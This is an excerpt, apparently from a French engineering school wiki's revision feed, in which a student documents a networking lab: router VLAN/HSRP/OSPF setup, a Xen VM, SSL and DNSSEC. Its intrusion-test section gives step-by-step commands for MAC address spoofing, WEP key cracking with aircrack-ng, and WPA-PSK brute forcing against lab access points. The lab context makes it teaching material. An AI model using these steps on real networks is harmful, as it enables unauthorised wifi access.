&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
Pour cela j'installe aircrack.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install aircrack-ng&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Modification du fichier /etc/apt/sources.list : &lt;br /&gt;
rajout de contrib non-free&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/network/interfaces : &lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static &lt;br /&gt;
     address 172.20.106.6&lt;br /&gt;
     netmask 255.255.255.0&lt;br /&gt;
     gateway 172.20.106.254&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/resolv.conf : &lt;br /&gt;
nameserver 193.48.57.34&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install firmware-linux-nonfree&lt;br /&gt;
apt-get remove network-manager&lt;br /&gt;
apt-get install broadcom-sta-dkms&lt;br /&gt;
modprobe wl&lt;br /&gt;
modprobe -r b44 b43 b43legacy ssb brcmsmac&lt;br /&gt;
modprobe -r wl&lt;br /&gt;
modprobe wl*dmseg&lt;br /&gt;
dmseg&lt;br /&gt;
ifconfig -a &lt;br /&gt;
reboot&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
code :&lt;br /&gt;
airmon -ng start wlan1 ==&amp;gt; cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin&lt;br /&gt;
soltion : apt-get install firmware-ralink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0&lt;br /&gt;
&lt;br /&gt;
Je ré-ouvre une mon0.&lt;br /&gt;
&lt;br /&gt;
J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.&lt;br /&gt;
&lt;br /&gt;
Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.&lt;br /&gt;
&lt;br /&gt;
Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)&lt;br /&gt;
&lt;br /&gt;
code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.&lt;br /&gt;
&lt;br /&gt;
Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va commencer par créer un dictionnaire  de clé : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main (void)&lt;br /&gt;
{&lt;br /&gt;
    int i=0;&lt;br /&gt;
    while(i&amp;lt;100000000)&lt;br /&gt;
    {&lt;br /&gt;
        printf(&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
        i++;&lt;br /&gt;
    }&lt;br /&gt;
    return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite récupérer le handshake :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
df&lt;br /&gt;
fdisk -l&lt;br /&gt;
mkfs /dev/sda1&lt;br /&gt;
mount /dev/sda1 /mnt&lt;br /&gt;
cp handshake-01.cap /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que le fichier est sur pifou, je lance le traitement :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w dico.txt handshake-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : Connexion sur Weppes puis ssh root@193.57.48.183&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je commence par installer sur la machine virtuellepostfix et bsd-mailx :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install postfix&lt;br /&gt;
vim /etc/aliases ==&amp;gt; rajout d'une ligne admin:   root&lt;br /&gt;
newaliases&lt;br /&gt;
apt-get install mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. &lt;br /&gt;
&lt;br /&gt;
En utilisant &amp;quot;p&amp;quot; je peux l'afficher.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Sécurisation de site web par certificat&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant je vais réclamer mon certificat : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Je vais sur le site de gandi&lt;br /&gt;
Je clique sur Certificat SSL qui est actuellement inactif&lt;br /&gt;
Je vais dans la FAQ et je cherche comment générer une CSR ? &lt;br /&gt;
Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM&lt;br /&gt;
Country Name (2 letter code) [AU]: FR&lt;br /&gt;
State or Province Name (full name) [Some-State]: Nord&lt;br /&gt;
Locality Name (eg, city) []: Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille&lt;br /&gt;
Organizational Unit Namec SSLCertificateChainFile.  (eg, section) []: &lt;br /&gt;
Common Name (eg, YOUR name) []: hunt3r.lol&lt;br /&gt;
Email Address []: admin@hunt3r.lol&lt;br /&gt;
A challenge password []: &lt;br /&gt;
An optional company name []:&lt;br /&gt;
Il me génère donc deux fichiers, le .csr et le .key&lt;br /&gt;
J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.&lt;br /&gt;
&lt;br /&gt;
Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)&lt;br /&gt;
Je valide ma demande grâce au code reçu dans ma boite mail hunt3r et j'attends le certificat.&lt;br /&gt;
Une fois reçu je crée un fichier Werewolf.cer et je colle le certificat que j'ai récupéré.&lt;br /&gt;
Même chose pour les certificats intermédiaire.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je peux commencer alors la configuration d'apache2 avec mon certificat :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cd /etc/apache2/sites-available&lt;br /&gt;
vim default-ssl.conf&lt;br /&gt;
                SSLCertificateFile      /root/Werewolf.cer&lt;br /&gt;
                SSLCertificateKeyFile /root/Werewolf.key&lt;br /&gt;
                #SSLCertificateChainFile /root/WerewolfInter.cer&lt;br /&gt;
&lt;br /&gt;
3 commandes me permettent de mettre en route le tout :&lt;br /&gt;
a2ensite default-ssl&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
service apache2 restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait, lorsque je vais sur ma page internet je remarque je peux y aller à la fois normalement c'est à dire en écrivant : http://www.hunt3r.lol/ mais aussi en utilisant la connexion sécurisée : https://www.hunt3r.lol/. On remarque qu'avec l'https on a bien un cadenas.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Sécurisation de serveur DNS par DNSSEC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cd /etc/bind&lt;br /&gt;
vim named.conf.options ==&amp;gt; rajout de l'option dnssec-enable yes;&lt;br /&gt;
mkdir hunt3r.dnssec&lt;br /&gt;
cd hunt3r.dnssec&lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE -r /dev/urandom hunt3r.dnssec&lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -n ZONE -r /dev/urandom hunt3r.dnssec&lt;br /&gt;
Je renomme les fichiers créé en : &lt;br /&gt;
    *hunt3r-ksk.key&lt;br /&gt;
    *hunt3r-ksk.private&lt;br /&gt;
    *hunt3r-zsk.key&lt;br /&gt;
    *hunt3r-zsk.private&lt;br /&gt;
J'inclus dans le fichier db.hunt3r : &lt;br /&gt;
    *$include /etc/bind/hunt3r.dnssec/hunt3r-ksk.key&lt;br /&gt;
    *$include /etc/bind/hunt3r.dnssec/hunt3r-zsk.key&lt;br /&gt;
dnssec-signzone -o hunt3r.lol -k hunt3r-ksk ../db.hunter hunt3r-zsk&lt;br /&gt;
Modification du fichier named.conf.local  ==&amp;gt; db.hunt3r.signed&lt;br /&gt;
service bind9 restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&lt;br /&gt;
Arrivée au partitionnement :&lt;br /&gt;
&lt;br /&gt;
J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. &lt;br /&gt;
Nom du miroir de l'archive Debian : debian.polytech-lille.fr&lt;br /&gt;
Mandataire HTTP : http://proxy.polytech-lille.fr:3128&lt;br /&gt;
Logiciels à installer : Xfce, service SSH  et utilitaies usuels du système (à valider à l'aider de la barre espace)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23162</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23162"/>
				<updated>2015-11-23T16:49:54Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;1&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;default&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
